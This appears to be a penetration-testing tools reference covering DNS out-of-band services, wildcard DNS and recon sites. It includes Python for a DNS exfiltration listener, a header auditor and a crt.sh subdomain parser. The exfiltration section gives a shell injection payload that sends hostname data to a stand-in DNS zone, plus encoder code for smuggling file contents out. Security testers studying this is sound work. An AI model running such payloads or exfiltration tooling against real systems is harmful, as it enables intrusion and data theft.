Useful Tools
Resolution
DNSBin is a tool for testing DNS-based data exfiltration and out-of-band (OOB) interactions. It is useful in blind scenarios such as RCE or XXE, where you see no direct output and need to confirm that the target can resolve a domain you control; the DNS query itself is the proof, and its labels can carry data.
pingb.in is a free DNS OOB service that receives and logs the DNS queries a target system makes, so you can verify blind vulnerabilities such as SSRF and RCE without standing up your own authoritative DNS server.
Mockbin lets you generate custom HTTP endpoints that capture, inspect and mock HTTP requests and responses. It is the HTTP counterpart of the DNS tools above: useful for testing webhooks, debugging HTTP clients and simulating APIs.
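The mechanics these DNS OOB services wrap are small enough to show in full. The Python below is an added example, not code from this page or from the DNSBin or pingb.in projects: it hex-encodes data into DNS labels under a per-test token, builds and parses the raw query packet, and runs a minimal UDP listener that logs every hit for a zone you control (the self-hosted equivalent of DNSBin). The zone name oob.example.net and the listener port 5353 are assumptions; a real deployment needs a zone whose NS record points at the listener host, on port 53.

```python
import secrets
import socket
import struct

# Assumed zone; in practice its NS record must point at the host running serve().
ZONE = "oob.example.net"


def make_token() -> str:
    """Random per-test label so a logged query can be tied to one payload or host."""
    return secrets.token_hex(8)


def encode_exfil(data: bytes, token: str, zone: str = ZONE) -> str:
    """Hex-encode data and split it into labels (63 chars max each, RFC 1035)."""
    hexed = data.hex()
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]
    name = ".".join(labels + [token, zone])
    if len(name) > 253:
        raise ValueError("payload too long for one name; split it over several queries")
    return name


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Minimal DNS query packet: header, one question (class IN), no EDNS."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_query(packet: bytes) -> tuple:
    """Return (qname, qtype, end_of_question) for the first question in a packet."""
    qdcount = struct.unpack("!H", packet[4:6])[0]
    if qdcount < 1:
        raise ValueError("no question section")
    pos, labels = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers do not appear in a question name
            raise ValueError("unexpected compression pointer")
        labels.append(packet[pos:pos + length].decode("ascii", "replace"))
        pos += length
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    return ".".join(labels), qtype, pos + 4


def decode_exfil(qname: str, zone: str = ZONE) -> tuple:
    """Inverse of encode_exfil: (token, data) from a logged name in our zone.
    bytes.fromhex is case-insensitive, so 0x20 case randomisation by resolvers is harmless."""
    suffix = "." + zone.lower()
    if not qname.lower().endswith(suffix):
        raise ValueError("not our zone")
    labels = qname[: -len(suffix)].split(".")
    return labels[-1].lower(), bytes.fromhex("".join(labels[:-1]))


def serve(zone: str = ZONE, port: int = 5353) -> None:
    """Tiny UDP listener: logs every query for the zone and answers NXDOMAIN so the
    resolver stops retrying. Port 5353 is an assumption; real use needs port 53."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        packet, peer = sock.recvfrom(512)
        try:
            qname, qtype, end = parse_query(packet)
        except (ValueError, IndexError, struct.error):
            continue
        try:
            token, data = decode_exfil(qname, zone)
            print(f"{peer[0]} token={token} qtype={qtype} data={data!r}")
        except ValueError:
            print(f"{peer[0]} other query: {qname}")
        # Reply: same id, flags QR|RD|RA|NXDOMAIN (0x8183), question echoed, no records.
        reply = packet[:2] + b"\x81\x83" + packet[4:6] + b"\x00" * 6 + packet[12:end]
        sock.sendto(reply, peer)


if __name__ == "__main__":
    # Offline round trip: what the target would send and what the listener would log.
    token = make_token()
    name = encode_exfil(b"root:x:0:0", token)
    logged = parse_query(build_query(name))[0]
    print(name, decode_exfil(logged))
```

On the target side the encode step is whatever the injection point allows, for example a shell payload of the form nslookup $(head -c 30 /etc/hostname | xxd -p).TOKEN.oob.example.net; the listener then prints the source IP, the token and the decoded bytes. Keep one unique token per payload and per target, otherwise you cannot tell which injection fired.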
Wildcard DNS
Wildcard DNS records use an asterisk (*) as the leftmost label to match any name that has no explicit record of its own, so a single entry such as *.example.com makes every otherwise undefined subdomain resolve to the same IP or resource.
http://xip.io/: xip.io was a public wildcard DNS service that mapped any name containing an IP address (e.g., 10.0.0.1.xip.io) directly to that IP, which simplifies local development and testing across devices without extra DNS configuration. The service has since been shut down and its names no longer resolve; nip.io (below) works the same way.
10.0.0.1.xip.io / www.10.0.0.1.xip.io / mysite.10.0.0.1.xip.io / foo.bar.10.0.0.1.xip.io: All of these names resolved to 10.0.0.1 through xip.io's wildcard DNS, so each local development site or virtual host could have its own hostname while everything pointed at one IP.
nip.io is a free wildcard DNS service that works like xip.io: any name containing an IP address (e.g., 10.0.0.1.nip.io) resolves to that IP, with any number of extra labels in front. It also accepts the dash-separated form (10-0-0-1.nip.io), which keeps the address in a single label.
10.0.0.1.nip.io / app.10.0.0.1.nip.io / customer1.app.10.0.0.1.nip.io / customer2.app.10.0.0.1.nip.io / otherapp.10.0.0.1.nip.io: These are all examples of nip.io's wildcard DNS, where any name that ends in an IP address followed by nip.io resolves to that IP, useful for multi-tenant or segmented development environments. Note that resolvers with DNS-rebinding protection (dnsmasq's stop-dns-rebind, some corporate and ISP resolvers) refuse to return private addresses from public DNS, so names like these may fail to resolve on such networks.
Reconnaissance
https://spyse.com/ (fully-fledged recon service)
Spyse is a comprehensive reconnaissance platform offering detailed information on domains, IPs, certificates, and infrastructure, supporting advanced security research and attack surface mapping.
https://dnsdumpster.com/ (DNS and subdomain recon)
DNSDumpster is a free online tool for DNS reconnaissance, enabling users to discover hosts, subdomains, and DNS records, and visualize domain infrastructure for security assessments.
Reverse IP Lookup (Domainmonitor)
This tool allows you to find all domains hosted on a single IP address, which is useful for identifying shared infrastructure or mapping an organization’s web presence.
Security headers (Security Report, missing headers)
Tools in this category analyze HTTP response headers to identify missing or misconfigured security headers, helping to assess a site’s security posture.
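What such a scanner actually does is a short checklist over the response headers. The Python below is an added example (not code from this page or from any of the listed services): it parses a raw HTTP response, reports headers that are missing or weak, treats CSP frame-ancestors as a valid substitute for X-Frame-Options, and can also run against a live URL. The sample response is constructed, not captured from any real site; the header list and the one-year HSTS threshold reflect common practice, not a formal standard.

```python
import re
import urllib.error
import urllib.request
from typing import Dict

# Headers most scanners flag. The value is a substring the header should contain,
# or None when presence alone is enough. Common practice, not a standard.
EXPECTED = {
    "strict-transport-security": "max-age=",
    "content-security-policy": None,
    "x-content-type-options": "nosniff",
    "x-frame-options": None,
    "referrer-policy": None,
    "permissions-policy": None,
}
ONE_YEAR = 31536000  # widely recommended HSTS minimum (hstspreload.org requires it)


def parse_response_headers(raw: str) -> Dict[str, str]:
    """Lowercase-keyed header dict from a raw HTTP/1.x response (status line first)."""
    headers: Dict[str, str] = {}
    for line in raw.split("\r\n")[1:]:
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Map of header -> finding ('missing' or 'weak: ...'); headers that pass are absent."""
    findings: Dict[str, str] = {}
    csp = headers.get("content-security-policy", "").lower()
    for name, needle in EXPECTED.items():
        value = headers.get(name)
        if value is None:
            # CSP frame-ancestors supersedes X-Frame-Options in current browsers.
            if name == "x-frame-options" and "frame-ancestors" in csp:
                continue
            findings[name] = "missing"
        elif needle and needle not in value.lower():
            findings[name] = f"weak: {value}"
    hsts = headers.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", hsts)
    if m and int(m.group(1)) < ONE_YEAR:
        findings["strict-transport-security"] = f"weak: max-age below one year ({hsts})"
    # unsafe-inline is ignored by browsers once a nonce or hash source is present.
    if "unsafe-inline" in csp and not re.search(r"'(nonce|sha256|sha384|sha512)-", csp):
        findings["content-security-policy"] = "weak: allows unsafe-inline without nonces/hashes"
    return findings


def fetch_headers(url: str, timeout: float = 15.0) -> Dict[str, str]:
    """Live check with a HEAD request; 4xx/5xx responses still carry their headers."""
    req = urllib.request.Request(url, method="HEAD", headers={"User-Agent": "hdr-audit-example"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            items = resp.headers.items()
    except urllib.error.HTTPError as err:
        items = err.headers.items()
    return {k.lower(): v for k, v in items}


# Constructed sample response (not captured from any real site).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Strict-Transport-Security: max-age=3600\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "Server: nginx\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for header, finding in sorted(audit_headers(parse_response_headers(SAMPLE_RESPONSE)).items()):
        print(f"{header}: {finding}")
```

Run it against a live target with audit_headers(fetch_headers("https://example.com/")); check the page you actually care about, not only the root, because frameworks often set headers per route.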
http://threatcrowd.org/ (WHOIS, DNS, email, and subdomain recon)
ThreatCrowd aggregates data from WHOIS, DNS, email, and subdomain sources to provide threat intelligence and help map relationships between domains and malicious activity.
https://mxtoolbox.com/ (wide range of DNS-related recon tools)
MXToolbox offers a suite of DNS-related tools, including MX record lookups, blacklist checks, and diagnostics for mail servers and domain configurations.
https://publicwww.com/ (Source Code Search Engine)
PublicWWW is a source code search engine that allows you to search for keywords, snippets, or technologies across the public web, aiding in reconnaissance and technology identification.
http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization)
ipv4info.com helps you find all domains and resources within a specific IP block owned by a company or organization, useful for mapping large network ranges.
HackerTarget Tools (DNS recon, site lookup, and scanning tools)
HackerTarget provides a collection of DNS reconnaissance, site lookup and network scanning tools for penetration testers and security researchers.
VirusTotal (WHOIS, DNS, and subdomain recon)
VirusTotal aggregates WHOIS, DNS and subdomain data and scans files and URLs for malware; its domain and IP views tie infrastructure to observed samples, supporting threat intelligence and incident response.
crt.sh (SSL certificate search)
crt.sh is a search engine over Certificate Transparency logs: it lists every logged certificate issued for a given domain, which reveals subdomains and related infrastructure, including names that were never meant to be public. A logged name proves only that a certificate was issued, not that the host is still live.
Google CT (SSL certificate transparency search)
Google's Certificate Transparency search lets you look up certificates issued for any domain, aiding subdomain discovery and monitoring for unauthorized certificates.
PenTest Tools (Google dorks)
These tools leverage advanced Google search queries (dorks) to discover sensitive information, misconfigurations or exposed assets that search engines have indexed.
Wayback Machine (Find content that was hosted on the domain in the past)
The Internet Archive's Wayback Machine lets you view historical snapshots of websites, which can uncover previously hosted content, old endpoints and parameters that the current site no longer links to.
FindSubdomains (Find subdomains using domain or keywords)
FindSubdomains discovers subdomains for a given domain or set of keywords, useful for expanding the attack surface during reconnaissance.
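The crt.sh and Google CT entries above both draw on the same data, and the crt.sh JSON output is easy to turn into a subdomain list. The Python below is an added example, not code from this page or from crt.sh: it parses that JSON into de-duplicated in-scope hostnames, keeps wildcard certificates separate (they name a zone, not a host), rejects look-alike names such as example.com.evil.test, and can optionally drop expired certificates. The sample JSON is constructed for this example; the query URL pattern with output=json is the real crt.sh interface.

```python
import json
import urllib.request
from datetime import datetime
from typing import List, Optional, Tuple


def _in_scope(name: str, domain: str) -> bool:
    """True only for the apex or a real subdomain, never for a suffix look-alike."""
    return name == domain or name.endswith("." + domain)


def ct_subdomains(json_text: str, domain: str,
                  as_of: Optional[str] = None) -> Tuple[List[str], List[str]]:
    """Return (hosts, wildcard_bases) found in crt.sh JSON for `domain`.

    as_of: ISO timestamp; when given, certificates that expired before it are
    skipped so the list leans toward hosts that are probably still live.
    """
    domain = domain.lower()
    cutoff = datetime.fromisoformat(as_of) if as_of else None
    hosts, wildcards = set(), set()
    for entry in json.loads(json_text):
        if cutoff is not None and datetime.fromisoformat(entry["not_after"]) < cutoff:
            continue
        # name_value lists every SAN in the certificate, newline separated;
        # common_name may add one more name that is not in the SAN list.
        names = set(entry["name_value"].split("\n")) | {entry.get("common_name", "")}
        for raw in names:
            name = raw.strip().lower().rstrip(".")
            if not name or not _in_scope(name, domain):
                continue
            if name.startswith("*."):
                wildcards.add(name[2:])
            else:
                hosts.add(name)
    return sorted(hosts), sorted(wildcards)


def fetch_crtsh(domain: str, timeout: float = 60.0) -> str:
    """Live query. %25 is a URL-encoded '%', crt.sh's SQL-style wildcard, so the
    query matches every name ending in .domain. The endpoint can be slow."""
    url = f"https://crt.sh/?q=%25.{domain}&output=json"
    req = urllib.request.Request(url, headers={"User-Agent": "ct-recon-example"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


# Constructed sample in the shape crt.sh returns (not real certificate data).
SAMPLE_CRTSH = json.dumps([
    {"id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2024-01-01T00:00:00", "not_after": "2024-03-31T23:59:59"},
    {"id": 2, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\nvpn.example.com",
     "not_before": "2024-05-01T00:00:00", "not_after": "2025-04-30T23:59:59"},
    {"id": 3, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "WWW.EXAMPLE.COM",
     "name_value": "WWW.EXAMPLE.COM",
     "not_before": "2024-04-01T00:00:00", "not_after": "2025-03-31T23:59:59"},
    {"id": 4, "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "example.com.evil.test",
     "name_value": "example.com.evil.test",
     "not_before": "2024-04-01T00:00:00", "not_after": "2025-03-31T23:59:59"},
])

if __name__ == "__main__":
    hosts, wildcards = ct_subdomains(SAMPLE_CRTSH, "example.com")
    print("hosts:", hosts)
    print("wildcard zones (enumerate these separately):", wildcards)
```

Wildcard bases deserve their own pass with a brute-force or permutation tool, since the certificate tells you a zone exists but not which names under it are live; and every host in the list still needs a resolution check before it counts as attack surface.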